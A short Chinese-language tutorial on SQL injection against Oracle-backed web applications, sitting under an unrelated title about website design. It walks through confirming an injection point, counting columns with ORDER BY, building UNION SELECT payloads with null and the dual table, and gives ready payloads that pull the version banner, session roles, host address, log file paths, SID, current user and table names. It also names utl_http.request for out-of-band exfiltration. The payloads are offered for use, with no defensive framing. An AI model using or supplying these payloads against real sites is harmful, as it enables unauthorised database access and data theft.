网站设计有限公司制作网页的流程
Oracle数据库的注入比mysql较复制。
一确定注入点:与mysql一样。
' and 1=1 -- + #文章有出现.
' and 1=2 -- + #文章不见了。
二。确定列数。
’order by 1,2 -- + #没问题
order by 1,2,3 -- + #保错,所以有两列。
三,所有union构造注入。
这里不一样了,因为orach要构造完整的语句,但也不知道表是什么,字段是什么,所以使用null和dual(虚拟表)来替代。
' union select 'null','null' from dual --%20+
四.查询当前数据库版本。
' union select banner,'null' from sys.v_$version where rownum=1--%20+
五.语句的查询信息。
1.当前用户权限 (select * from session_roles where rownum=1)
2.当前数据库版本 (select banner from sys.v_$version where rownum=1)
3.服务器出口IP (用utl_http.request反弹注入可以实现,下面详细操作)
4.服务器监听IP (select utl_inaddr.get_host_address from dual where rownum=1)
5.日志文件 (select member from v$logfile where rownum=1)
6.服务器sid(当前数据库也用这个即可) (select instance_name from v$instance where rownum=1)
7.当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual where rownum=1)
8.当前用户 (select user from dual where rownum=1)
9.当前数据库名 (select table_name from user_tables where rownum=1)
查看表的基本格式如下:
' UNION SELECT 'null' , (select table_name from user_tables where rownum=1) FROM DUAL--
基本改()的内容即可。